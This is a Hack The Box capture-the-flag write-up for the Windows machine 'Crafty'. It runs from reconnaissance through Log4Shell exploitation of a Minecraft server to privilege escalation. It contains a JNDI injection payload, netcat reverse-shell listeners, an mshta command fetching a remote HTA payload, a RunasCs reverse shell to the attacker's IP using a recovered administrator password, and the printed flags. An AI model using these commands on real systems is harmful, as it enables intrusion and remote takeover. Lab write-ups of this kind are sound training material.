Table of contents

Reconaisance

NMAP

nmap -p- -T4 10.10.11.249 -v
nmap -p80 -sS -sC -sV 10.10.11.249 -v
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://crafty.htb
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

adding crafty.htb to /etc/hosts. a Windows machine

WEB

Main Page says that here is Join 1277 other players on play.crafty.htb, but it is not worth it.

http://crafty.htb/js/main.js says

...
// This is to fetch the player count
$(document).ready(() => {
    let ip = $(".sip").attr("data-ip");
    let port = $(".sip").attr("data-port");
    if (port == "" || port == null) port = "25565";
    if (ip == "" || ip == null) return console.error("Error fetching player count - is the IP set correctly in the HTML?");
    updatePlayercount(ip, port);
    // Updates every minute (not worth changing due to API cache)
    setInterval(() => {
        updatePlayercount(ip, port);
    }, 60000);
});

const updatePlayercount = (ip, port) => {
    $.get(`https://api.bybilly.uk/api/players/${ip}/${port}`, (result) => {
        if (result.hasOwnProperty('online')) {
            $(".sip").html(result.online);
        } else {
            $(".playercount").html("Server isn't online!");
        }
    });
};
...

Minecraft

┌──(kali㉿kali)-[~]
└─$ nc -v play.crafty.htb 25565
crafty.htb [10.10.11.249] 25565 (?) open

Sending big input gives following

{"translate":"disconnect.genericReason","with":["Internal Exception: io.netty.handler.codec.DecoderException: java.lang.IndexOutOfBoundsException: Index: 65, Size: 1"]}

which means some Java App - most proabably Minecraft

Lets connect to the Minecraft Server, install the client, I used the following

• https://tlauncher.org/en/ and enter the address: play.crafty.htb:25565

Means we need 1.16.5. After installing it we can join the server.

Let’s try log4j

• https://hackernoon.com/pentests-and-log4j-how-to-exploit-a-vulnerable-system
• https://github.com/kozmer/log4j-shell-poc

To run the exploit:

• In one terminal:

nc -lvnp 9001

• in another

git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
vim poc.py 
# change /bin/sh to cmd
# the machine is Windows
python3 poc.py --userip 10.10.14.92 --webport 8000 --lport 9001
# then paste  ${jndi:ldap://10.10.14.92:1389/a} in chat in the minecraft server

c:\Users\svc_minecraft>type Desktop\user.txt
4f494d9b733bb35ebe5e69881987a109

Get better shell

msfconsole
# then 
use exploit/windows/misc/hta_server
set lhost <ip>
run
# then in windows 
mshta http://10.10.14.92:8080/2ao4a48kDfJgdCl.hta

PrivEsc with RE

Interesting Minecraft Plugin

C:\Users\svc_minecraft\server\plugins>dir

10/27/2023  02:48 PM    <DIR>          .
10/27/2023  02:48 PM    <DIR>          ..
10/27/2023  02:48 PM             9,996 playercounter-1.0-SNAPSHOT.jar

meterpreter > download playercounter-1.0-SNAPSHOT.jar

Reverse engineering with JD GUI.

wget https://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.deb
sudo dpkg -i jd-gui-1.6.6.deb

then open it with the app

• https://github.com/Glavo/rcon-java

it has some password!

We gonna use following command: RunasCs

• https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip

# in one terminal
nc -lvnp 1234
# in another
meterpreter > upload RunasCs.exe 
meterpreter > shell
C:\> RunasCs.exe administrator s67u84zKq8IXw cmd.exe -r 10.10.14.92:1234

C:\Users\Administrator\Desktop>type root.txt
f097956c9bce551d3bd3d38668453294

Result

• https://www.hackthebox.com/achievement/machine/1349385/587